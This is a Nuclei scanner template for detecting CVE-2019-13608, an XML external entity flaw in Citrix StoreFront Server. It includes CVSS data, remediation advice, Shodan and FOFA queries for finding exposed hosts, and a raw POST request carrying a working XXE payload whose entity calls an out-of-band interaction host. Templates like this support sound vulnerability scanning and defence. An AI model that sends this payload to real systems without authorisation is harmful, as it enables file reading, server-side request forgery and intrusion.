id: CVE-2019-13608

info:
  name: Citrix StoreFront Server - XML External Entity
  author: daffainfo
  severity: high
  description: |
    Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.
  impact: |
    Attackers can read arbitrary files, perform server-side request forgery, or cause denial of service through XXE attacks.
  remediation: |
    Update to version 1903 or later for StoreFront, CU4 or later for 7.15 LTSR, CU8 or later for 7.6 LTSR.
  reference:
    - https://www.exploit-db.com/exploits/47561
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX251988
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13608
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-13608
    cwe-id: CWE-611
    epss-score: 0.71255
    epss-percentile: 0.98733
    cpe: cpe:2.3:a:citrix:storefront_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: citrix
    product: storefront_server
    shodan-query: "/Citrix/StoreWeb"
    fofa-query: "/Citrix/StoreWeb"
  tags: cve,cve2019,citrix,storefront_server,xxe,kev,vkev

http:
  - raw:
      - |
        POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/vnd.citrix.requesttoken+xml
        Accept: application/vnd.citrix.requesttokenresponse+xml, text/xml, application/vnd.citrix.authenticateresponse-1+xml

        <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://{{interactsh-url}}"> %xxe; ]>
        <requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken">
          <for-service>6b78ab94-a709-4e3a-8b9b-a49ca317c70c</for-service>
          <for-service-url>https://www.example.com/Citrix/Store/resources/v2</for-service-url>
          <reqtokentemplate />
          <requested-lifetime>1.00:00:00</requested-lifetime>
        </requesttoken>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: content_type
        words:
          - "vnd.citrix.authenticateresponse"

      - type: word
        part: body
        words:
          - "<AuthenticateResponse"
          - "error-bad-request"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402207d360338c19d69761fb31f365fda44642a52e0cac158b27d223262bb75e65d5b02205c0888c7c0b53efec10f23fe7c3bb87775f42cc353738be5b008a55d7db873f4:922c64590222798bb761d5b6d8e72950